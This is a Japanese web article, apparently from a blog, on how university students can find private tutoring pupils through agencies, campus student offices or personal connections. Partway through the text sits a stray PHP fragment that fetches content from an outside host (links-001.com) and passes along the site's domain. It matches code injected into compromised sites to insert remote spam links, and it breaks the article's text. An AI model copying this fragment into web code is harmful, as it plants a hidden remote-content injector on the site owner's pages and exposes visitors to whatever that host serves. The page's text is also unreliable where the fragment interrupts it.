前へ
次へ

家庭教師の生徒を探すには

大学生にとって割のいいバイトは何と言っても家庭教師です。
束縛時間は1時間程度からと短くて済み、時給は数千円にもなります。
1人何教科か教えて掛け持ちすれば、大学生にとってはかなりの収入が得られます。
また、大学生は猛勉強をした時期からさほど経っていないので頭の中に学校の勉強の知識が残っています。
なので改めて勉強しなおしたりする必要がなく、効率がいいです。
さて、家庭教師をするには生徒がいなければ始まりません。
一般的には派遣のようなシステムやアルバイトという形で企業と契約します。
これがいちばん無難な形態ではないでしょうか。
というのは、どこか専門の企業と契約していれば生徒が切れることもありませんし、不払いなどのトラブルも防げます。
また、生徒や生徒の親から何かしらのクレームがついた場合でも企業が間に入って取り持ってもらえます。
特に成績のことについては「成績が上がらなかった」「テストでいい点が取れなかった」など、不可抗力のような行き違いが起こることも考えられます。
こういったことも、間に企業が入れば安心です。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

また、有名私大などに通っている場合には学生課で教える生徒を探すこともできます。
親も大学生なら誰でもいいわけではなく、どうせなら有名大学の学生に教えてもらいたいですから、求人もたくさん来るでしょう。
もちろん競争率も高いので、こまめに通って新しい求人をめざとく見つける必要があります。
また、有名大学だとコネも発達しています。
学生課を通さなくても、「知り合いの教授の娘が英語を教えてほしいらしい」などとコネで生徒を紹介されることもしばしばです。
成績が優秀だったり英語がかなりできるなど、特別学力に秀でていて、しかも教育学部だったりする場合、ほとんどコネで生徒をまかなえることもあります。
コネの場合も間に人が入るので、直に生徒を取るよりも安心感があります。
もちろん、コネで手配してくれた人たちの期待に応えられるよう、誠心誠意教えることも重要でしょう。

Page Top